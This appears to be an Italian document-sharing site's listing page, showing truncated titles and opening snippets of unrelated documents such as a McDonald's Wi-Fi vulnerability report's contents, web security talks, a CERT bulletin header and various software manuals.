McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

NAL DI STAGING. Versione 1.0

NAL DI STAGING. Versione 1.0 NAL DI STAGING Versione 1.0 14/10/2008 Indice dei Contenuti 1. Introduzione... 3 2. Installazione NAL di staging... 3 VMWare Server... 3 Preistallazione su server linux... 6 Preinstallazione su server

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

Internet Banking e Web Security

Internet Banking e Web Security Internet Banking e Web Security Giorgio Fedon Chief Operation Officer Minded Security S.r.l. OWASP-Day II Università La Sapienza, Roma 31st, March 2008 giorgio.fedon@mindedsecurity.com Copyright 2008 -

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

MIXER: gestione trasmissioni DJ: governance di MIXER

MIXER: gestione trasmissioni DJ: governance di MIXER MIXER-DJ MIXER: gestione trasmissioni DJ: governance di MIXER MIXER Mixer è un ambiente applicativo di tipo Enterprise Service Bus (ESB) per la gestione delle trasmissioni di file su Linux. All'interno

Dettagli

Velocizzare l'esecuzione di Joomla! con Zend Server Community Edition

Velocizzare l'esecuzione di Joomla! con Zend Server Community Edition Velocizzare l'esecuzione di Joomla! con Zend Server Community Edition Enrico Zimuel Senior Consultant & Architect Zend Technologies enrico@zend.com Sommario Zend Server Community Edition (CE) Perchè eseguire

Dettagli

PHOENIX S.P.A. ANALISI DI SICUREZZA. Milano, 31 Ottobre 2008. Nome e Cognome Società Ruolo Riferimenti

PHOENIX S.P.A. ANALISI DI SICUREZZA. Milano, 31 Ottobre 2008. Nome e Cognome Società Ruolo Riferimenti PHOENIX S.P.A. ANALISI DI SICUREZZA Milano, 31 Ottobre 2008 PARTECIPANTI Nome e Cognome Società Ruolo Riferimenti Gianluca Vadruccio Ivan Roattino Silvano Viviani Hacking Team Hacking Team Direzione Tecnica

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere

Dettagli

Server-side Programming: Java servlets Parte II

Server-side Programming: Java servlets Parte II Corso di Laurea Specialistica in Ingegneria Informatica Corso di Laurea Specialistica in Ingegneria delle Telecomunicazioni Corso di Reti di Applicazioni Telematiche a.a. 2009-2010 Server-side Programming:

Dettagli

Architetture per le applicazioni web-based. Mario Cannataro

Architetture per le applicazioni web-based. Mario Cannataro Architetture per le applicazioni web-based Mario Cannataro 1 Sommario Internet e le applicazioni web-based Caratteristiche delle applicazioni web-based Soluzioni per l architettura three-tier Livello utente

Dettagli

Un approccio innovativo basato su tecnologie Open Source. White Paper

Un approccio innovativo basato su tecnologie Open Source. White Paper Soluzioni software di CRM "Customer Relationship Management" Gestione delle relazioni con i clienti, delle trattative commerciali e delle iniziative di marketing, Gestione delle attività di supporto post-vendita

Dettagli

Mail: contatti@tc-group.it UNI EN ISO 9001:2008

Mail: contatti@tc-group.it UNI EN ISO 9001:2008 T.&C.Systems Group S.r.l. Sede Legale e Operativa: Tel. : 081 787 73 91 Cap. Soc. 50.000,00 i.v. Viale della Costituzione Isola G1 Fax : 081 750 29 03 C.F./P.iva: 07699310632 80143 Centro Direzionale (NA)

Dettagli

BIMPublisher Manuale Tecnico

BIMPublisher Manuale Tecnico Manuale Tecnico Sommario 1 Cos è BIMPublisher...3 2 BIM Services Console...4 3 Installazione e prima configurazione...5 3.1 Configurazione...5 3.2 File di amministrazione...7 3.3 Database...7 3.4 Altre

Dettagli

Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005

Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005 Sommario Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005 Introduzione.................................................................................. 1 SOAP........................................................................................

Dettagli

Protocolli e architetture per WIS

Protocolli e architetture per WIS Protocolli e architetture per WIS Web Information Systems (WIS) Un Web Information System (WIS) usa le tecnologie Web per permettere la fruizione di informazioni e servizi Le architetture moderne dei WIS

Dettagli

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Milano, 13 Novembre 2006 n. 20061113.mb44 Alla cortese attenzione: Ing. Carlo Romagnoli Dott.ssa Elisabetta Longhi Oggetto: per Attività di Vulnerability

Dettagli

SchoolData. Pagina 1 di 6

SchoolData. Pagina 1 di 6 SchoolData Pagina 1 di 6 Cos è SchoolData: A partire dalle esperienze professionali di singoli docenti e dalle problematiche emerse nella gestione delle programmazioni didattiche di un istituto scolastico

Dettagli

Tutorial web Application

Tutorial web Application Tutorial web Application Installazione della JDK: Java viene distribuito con la jdk e il jre acronimi di Java Development Kit e Java Runtime Environment rispettivamente. La jdk è l'ambiente di sviluppo

Dettagli

Tracciabilità degli utenti in applicazioni multipiattaforma

Tracciabilità degli utenti in applicazioni multipiattaforma Tracciabilità degli utenti in applicazioni multipiattaforma Case Study assicurativo/bancario Yann Bongiovanni y.bongiovanni@integra-group.it Roma, 4 ottobre 2006 Retroscena Un azienda multinazionale del

Dettagli

1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI

1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI 1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI Per implementare una piattaforma di e-learning occorre considerare diversi aspetti organizzativi, gestionali e tecnici legati essenzialmente

Dettagli

MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP. Link.it srl - Analisi Servizio IGRUE 1

MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP. Link.it srl - Analisi Servizio IGRUE 1 MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP Link.it srl - Analisi Servizio IGRUE 1 Panoramica L'attuale sistema IGRUE è composto da: Il

Dettagli

Server web e protocollo HTTP

Server web e protocollo HTTP Server web e protocollo HTTP Dott. Emiliano Bruni (info@ebruni.it) Argomenti del corso Cenni generali sul web IIS e Apache Il server web Micsosoft Internet Information Server 5.0 Il server web Apache 2.0

Dettagli

Manuale utente. ver 1.0 del 31/10/2011

Manuale utente. ver 1.0 del 31/10/2011 Manuale utente ver 1.0 del 31/10/2011 Sommario 1. Il Servizio... 2 2. Requisiti minimi... 2 3. L architettura... 2 4. Creazione del profilo... 3 5. Aggiunta di un nuovo dispositivo... 3 5.1. Installazione

Dettagli

Indice. Prefazione. Presentazione XIII. Autori

Indice. Prefazione. Presentazione XIII. Autori INDICE V Indice Prefazione Presentazione Autori XI XIII XV Capitolo 1 Introduzione alla sicurezza delle informazioni 1 1.1 Concetti base 2 1.2 Gestione del rischio 3 1.2.1 Classificazione di beni, minacce,

Dettagli

MEGA Advisor Architecture Overview MEGA 2009 SP5

MEGA Advisor Architecture Overview MEGA 2009 SP5 Revisione: August 22, 2012 Creazione: March 31, 2010 Autore: Jérôme Horber Contenuto Riepilogo Il documento descrive i requisiti sistema e le architetture di implementazione possibili per MEGA Advisor.

Dettagli